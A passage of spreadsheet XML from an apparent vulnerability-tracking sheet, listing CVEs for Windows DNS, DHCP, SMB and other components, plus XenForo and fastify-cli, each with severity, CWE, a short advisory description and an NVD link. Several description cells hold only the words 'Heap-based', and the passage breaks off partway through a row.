      <c r="S336" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69620</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69680</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="S337" s="5" t="inlineStr">
        <is>
          <t>Origin validation error in Windows DNS allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69680</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69732</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S338" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69732</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69782</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S339" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69782</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69786</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr"/>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q340" s="5" t="inlineStr"/>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S340" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69786</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69813</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K341" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q341" s="5" t="inlineStr"/>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S341" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69827</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr"/>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q342" s="5" t="inlineStr"/>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S342" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69827</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69858</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K343" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q343" s="5" t="inlineStr"/>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S343" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69989</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K344" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q344" s="5" t="inlineStr"/>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S344" s="5" t="inlineStr">
        <is>
          <t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69989</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70342</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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5" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S345" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70563</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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6" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S346" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72936</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr"/>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S347" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows SMB Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72936</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72981</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr"/>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S348" s="5" t="inlineStr">
        <is>
          <t>Use after free in IP Helper allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72981</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72987</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K349" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S349" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72987</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73313</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr"/>
      <c r="K350" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S350" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a multi-factor authentication bypass vulnerability in the passkey TFA provider that allows an authenticated attacker to complete login as another user by submitting their own registered passkey credential during the WebAuthn assertion step. The passkey verification path performs a global credential lookup without validating that the matched credential belongs to the user whose login is pending, enabling an attacker who knows a target account's password to sign the challenge with their own passkey and bypass multi-factor authentication on both public forum and ACP login paths.</t>
        </is>
      </c>
      <c r="T350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73313</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75021</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>CWE-1327</t>
        </is>
      </c>
      <c r="S351" s="5" t="inlineStr">
        <is>
          <t>fastify-cli starts the Node.js Inspector when a debug flag is used, but it ignores the explicit bind address the user supplies and binds the Inspector to a broadly reachable address instead of the intended loopback. As a result the debugging interface can be exposed beyond the local machine, and because the Inspector protocol allows arbitrary code evaluation, a remote party that reaches it can achieve remote code execution on the developer's machine. This affects fastify-cli from 1.5.0 up to 8.0.1. Users should upgrade to fastify-cli 8.0.1, which honors the configured Inspector bind address.</t>
        </is>
      </c>
      <c r="T351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75021</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77505</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S352" s="5" t="inlineStr">
        <is>
          <t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77505</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78444</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K353" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
